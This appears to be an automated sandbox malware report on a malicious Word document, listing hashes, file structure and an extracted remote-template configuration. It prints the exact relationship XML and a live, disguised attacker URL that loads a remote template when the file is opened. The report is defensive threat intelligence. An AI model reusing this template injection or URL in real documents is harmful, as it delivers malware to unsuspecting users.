Malicious
Malicious

c76bd140c1cb43d8b1836833219fc55d

MS Word Document
|
MD5: c76bd140c1cb43d8b1836833219fc55d
|
Size: 274.19 KB
|
application/msword

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
c76bd140c1cb43d8b1836833219fc55d
Sha1
49cdb115de4285558d7ffd92a89d8de12007f7c4
Sha256
ffb73ca08939ac414d353cfb188d6c2a087748349fb5d3d876d480c7e6637761
Sha384
09a6073213c0f3e8b628d0c395b0903fe82f09235f8bb910f81c18590c4419be74b5eb5ed34a92728202830ea3c09058
Sha512
3dace036e83f37080570e4ff9c9c8a78b6215bf80111de41cc58dae62c911e552aca76825f83ba6b296d3c7e7f1deb48cdce29cae58d60cf974d87e1b72470bb
SSDeep
3072:s+lTRadd4bZ8a1B02k7eHPUYBvvs+Q54hEK+n7fWsGInlX52N+/:s+K+bx1+/k8ovbQ54SvJF57/
TLSH
1E44C098DAF700B9EB23675F5454DF02842D3D2D7E6298128768EE78B2CC99F1460FC6
File Structure
c76bd140c1cb43d8b1836833219fc55d
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
footer2.xml.rels
settings.xml.rels
Malicious
document.xml
footnotes.xml
footer3.xml
footer2.xml
header3.xml
header2.xml
endnotes.xml
embeddings
Microsoft_Office_Excel_Worksheet1.xlsx
[Content_Types].xml
_rels
.rels
xl
_rels
workbook.xml.rels
workbook.xml
styles.xml
worksheets
sheet2.xml
_rels
sheet1.xml.rels
sheet2.xml.rels
sheet1.xml
drawings
_rels
vmlDrawing1.vml.rels
vmlDrawing2.vml.rels
vmlDrawing2.vml
drawing1.xml
vmlDrawing1.vml
theme
theme1.xml
media
image2.emf
image1.emf
sharedStrings.xml
docProps
thumbnail.wmf
core.xml
app.xml
media
image1.emf
theme
theme1.xml
settings.xml
webSettings.xml
fontTable.xml
styles.xml
docProps
app.xml
core.xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://bestthingswithbetterpeoplesaroundonmebrotherfporbetterfuturesgetba.docx@ateng.me/MAU7Mq
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://bestthingswithbetterpeoplesaroundonmebrotherfporbetterfuturesgetba.docx@ateng.me/MAU7Mq" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value
Remote Template - Highly Suspicious

https://bestthingswithbetterpeoplesaroundonmebrotherfporbetterfuturesgetba.docx@ateng.me/MAU7Mq
c76bd140c1cb43d8b1836833219fc55d (274.19 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙